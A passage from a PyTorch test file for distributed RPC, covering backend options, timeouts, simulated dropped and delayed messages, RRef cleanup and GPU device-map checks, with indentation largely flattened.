rpc_backend_options=rpc_backend_options,
)
self.assertIn(
"To silence this warning pass `backend=BackendType.PROCESS_GROUP` explicitly.",
"\n".join(cm.output),
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.ProcessGroupAgent)
def test_logs_deprecation_warning(self):
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=self.rpc_backend_options,
)
self.assertIn(
"It is recommended to migrate to the TENSORPIPE backend.",
"\n".join(cm.output),
)
@skip_if_lt_x_gpu(2)
@dist_init
def test_cuda(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(3, 3).cuda(0)
t2 = torch.rand(3, 3).cuda(1)
t3 = torch.rand(3, 3)
# cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t2))
# mix of cpu and cuda tensors as args fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, torch.add, args=(t1, t3))
# gpu tensor list as args fails.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
            rpc.rpc_sync(dst, RpcTest._gpu_tensor_list_arg, args=([t1, t2],))
# cuda tensors as return values fail.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor, args=())
        # cuda tensors in a list of return values fail
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(dst, RpcTest._return_gpu_tensor_list, args=())
# Sending to self should fail too.
with self.assertRaisesRegex(RuntimeError, "RPC backend only supports CPU tensors.*Found tensor on device: cuda:0"):
rpc.rpc_sync(worker_name(self.rank), torch.add, args=(t1, t2))
def test_single_threaded_rref_owner(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
            # make sure there are no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# using RRefs on dst
futs = []
for i in range(len(rrefs)):
futs.append(
rpc.rpc_async(dst, my_rref_function, args=(rrefs[i], rrefs[i]))
)
# wait for results and check
for i in range(len(futs)):
self.assertEqual(2 * (torch.zeros(2, 2) + i), futs[i].wait())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(futs), num_owner_rrefs)
# trigger RRef deletion
del futs
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
        # use a barrier to prevent messages sent during shutdown from occupying the
        # only thread on the callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
def test_single_threaded_rref_to_here(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
            # make sure there are no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# wait for results and check
for i in range(len(rrefs)):
self.assertEqual(torch.zeros(2, 2) + i, rrefs[i].to_here())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(rrefs), num_owner_rrefs)
# trigger RRef deletion
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
        # use a barrier to prevent messages sent during shutdown from occupying the
        # only thread on the callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
@dist_init
def test_process_group_debug_info(self):
rpc.enable_gil_profiling(True)
initialize_pg(self.file_init_method, self.rank, self.world_size)
NUM_THREAD = self.rpc_backend_options.num_send_recv_threads
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# for the above check, add a barrier to ensure that another worker
# cannot send a request before we check num_idle_threads, since we'd
# use up an idle thread if we start processing that request.
dist.barrier()
dst_rank = (self.rank + 1) % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank), set_and_check_done, args=(dst_rank,)
)
# blocks until the request arrives
self.assertEqual(self.rank, VALUE_FUTURE.result())
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertIn("agent.gil_average_wait_time_us", info)
self.assertGreaterEqual(float(info["agent.gil_average_wait_time_us"]), 0)
self.assertEqual(int(info["agent.num_pending_requests"]), 1)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
num_idle_threads = int(info["agent.num_idle_threads"])
# as we cannot know for sure whether the send thread has returned, there
# might be either 1 or 2 busy threads
self.assertTrue(num_idle_threads in [NUM_THREAD - 1, NUM_THREAD - 2])
# add a barrier to make sure the request is not finished before checking
# num_pending_requests
dist.barrier()
DONE_FUTURE.set_result(self.rank)
self.assertEqual(dst_rank, fut.wait())
# add a barrier to make sure the dst_rank has finished processing the
# request
dist.barrier()
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
for retry in range(3):
# even if the future has completed, there is no guarantee that
# the local send/recv threads would have finished. We try three
# times. (NB: this might potentially be flaky. If flakiness does
# occur, then we have to relax the assert.)
info = rpc.api._get_current_rpc_agent().get_debug_info()
if int(info["agent.num_idle_threads"]) == NUM_THREAD:
break
time.sleep(0.1)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# add a barrier to make sure SHUTDOWN message is not sent
dist.barrier()
@dist_init(setup_rpc=False)
def test_set_and_get_num_send_recv_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing ProcessGroupRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout,
)
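# Tests run against the faulty RPC agent, which drops (messages_to_fail) or delays (messages_to_delay) selected message types.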
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
    # Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
    # on the owning nodes; this is expected because the OwnerRRef was never
    # successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
        # 1 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
        # NOTE: we only test this when not sending to self, as to_here()
        # calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
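# Tests specific to the TensorPipe RPC agent, including device-map support for CUDA tensors.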
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
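    # Helper: init_rpc with the given options should be rejected with a ValueError and leave no RPC agent set.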
def _test_device_maps(self, options, errMsg="Invalid device_map"):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(options, "Wrong worker names")
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(options)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(options)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(options)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
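        # With this map, the caller's cuda:0 args land on the callee's cuda:1, and the callee's cuda:0 result comes back on the caller's cuda:1.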
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 0, y.is_cuda, y.device.index == 1]):
return x + y.to(0), x.to(1) - y
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 1})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(1), torch.ones(2).to(0))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
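    # Takes CPU inputs and returns four results on callee cuda:0-3; used to check that return values are mapped back to caller devices.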
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(1), torch.ones(2).to(0))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
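    # Helper: without a device map configured, sending CUDA tensors should fail with a clear error while leaving RPC usable for CPU tensors.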
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
